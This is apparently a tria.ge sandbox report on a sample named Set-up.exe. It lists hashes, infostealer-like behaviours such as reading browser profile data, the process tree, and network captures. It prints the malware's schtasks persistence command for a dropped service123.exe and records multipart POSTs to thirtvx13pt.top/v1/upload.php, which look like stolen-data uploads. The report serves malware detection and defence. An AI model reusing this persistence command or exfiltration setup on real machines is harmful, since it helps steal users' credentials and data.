Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    140s
  • max time network
    144s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    03/10/2024, 22:01 UTC

General

  • Target

    Set-up.exe

  • Size

    6.7MB

  • MD5

    e8f6d16ad939c06d972ed7afb3bcf335

  • SHA1

    a7c1b12fc853a28d468b5fa9bc7e6be63a05b4f2

  • SHA256

    5df593109be04e8263413ee6afbebe8f136cd0136e2fc7b070a19099f7ab015d

  • SHA512

    79d4a997a9a85f76871d9f5df74444f481de040651c904007ff5a626ecd7f5cdd5ecb47d274d82351d49f5de71cdff0502fc2b0735897844ee19cf79bb5498e6

  • SSDEEP

    196608:gONiBa+mq9aq5g7PLnYiJGb6/CdnK8dN:gONiBa+mq9aq5g7PLnYiJGbb

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Set-up.exe
    "C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\Users\Admin\AppData\Local\Temp\service123.exe
      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:3048
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:1644
  • C:\Users\Admin\AppData\Local\Temp\service123.exe
    C:\Users\Admin\AppData\Local\Temp\/service123.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:3596
  • C:\Users\Admin\AppData\Local\Temp\service123.exe
    C:\Users\Admin\AppData\Local\Temp\/service123.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:2708

Network

  • flag-us
    DNS
    thirtvx13pt.top
    Set-up.exe
    Remote address:
    8.8.8.8:53
    Request
    thirtvx13pt.top
    IN A
    Response
    thirtvx13pt.top
    IN A
    185.244.181.140
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Set-up.exe
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    nexusrules.officeapps.live.com
    Set-up.exe
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
    Response
    nexusrules.officeapps.live.com
    IN CNAME
    prod.nexusrules.live.com.akadns.net
    prod.nexusrules.live.com.akadns.net
    IN A
    52.111.229.19
  • flag-ru
    POST
    http://thirtvx13pt.top/v1/upload.php
    Set-up.exe
    Remote address:
    185.244.181.140:80
    Request
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary87984241
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 411
    Host: thirtvx13pt.top
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 03 Oct 2024 22:02:29 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: close
    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
  • flag-us
    DNS
    140.181.244.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    140.181.244.185.in-addr.arpa
    IN PTR
    Response
    140.181.244.185.in-addr.arpa
    IN PTR
    v982091macloudhost
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-ru
    POST
    http://thirtvx13pt.top/v1/upload.php
    Set-up.exe
    Remote address:
    185.244.181.140:80
    Request
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary67913200
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 77003
    Host: thirtvx13pt.top
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 03 Oct 2024 22:02:33 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: close
    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
  • flag-ru
    POST
    http://thirtvx13pt.top/v1/upload.php
    Set-up.exe
    Remote address:
    185.244.181.140:80
    Request
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary72653909
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 24618
    Host: thirtvx13pt.top
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 03 Oct 2024 22:02:36 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: close
    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
  • 185.244.181.140:80
    http://thirtvx13pt.top/v1/upload.php
    http
    Set-up.exe
    1.0kB
    381 B
    6
    4

    HTTP Request

    POST http://thirtvx13pt.top/v1/upload.php

    HTTP Response

    200
  • 185.244.181.140:80
    http://thirtvx13pt.top/v1/upload.php
    http
    Set-up.exe
    79.8kB
    1.5kB
    62
    32

    HTTP Request

    POST http://thirtvx13pt.top/v1/upload.php

    HTTP Response

    200
  • 185.244.181.140:80
    http://thirtvx13pt.top/v1/upload.php
    http
    Set-up.exe
    25.9kB
    981 B
    24
    19

    HTTP Request

    POST http://thirtvx13pt.top/v1/upload.php

    HTTP Response

    200
  • 8.8.8.8:53
    thirtvx13pt.top
    dns
    Set-up.exe
    203 B
    308 B
    3
    3

    DNS Request

    thirtvx13pt.top

    DNS Response

    185.244.181.140

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    nexusrules.officeapps.live.com

    DNS Response

    52.111.229.19

  • 8.8.8.8:53
    140.181.244.185.in-addr.arpa
    dns
    146 B
    266 B
    2
    2

    DNS Request

    140.181.244.185.in-addr.arpa

    DNS Request

    19.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2708-43-0x0000000000C40000-0x0000000000C52000-memory.dmp

    Filesize

    72KB

  • memory/3048-24-0x0000000000C40000-0x0000000000C52000-memory.dmp

    Filesize

    72KB

  • memory/3048-25-0x00000000753A0000-0x00000000754D4000-memory.dmp

    Filesize

    1.2MB

  • memory/3172-0-0x0000000069CC0000-0x000000006A377000-memory.dmp

    Filesize

    6.7MB

  • memory/3172-9-0x00000000009F0000-0x00000000010A4000-memory.dmp

    Filesize

    6.7MB

  • memory/3172-22-0x00000000009F0000-0x00000000010A4000-memory.dmp

    Filesize

    6.7MB

  • memory/3596-28-0x0000000000C40000-0x0000000000C52000-memory.dmp

    Filesize

    72KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.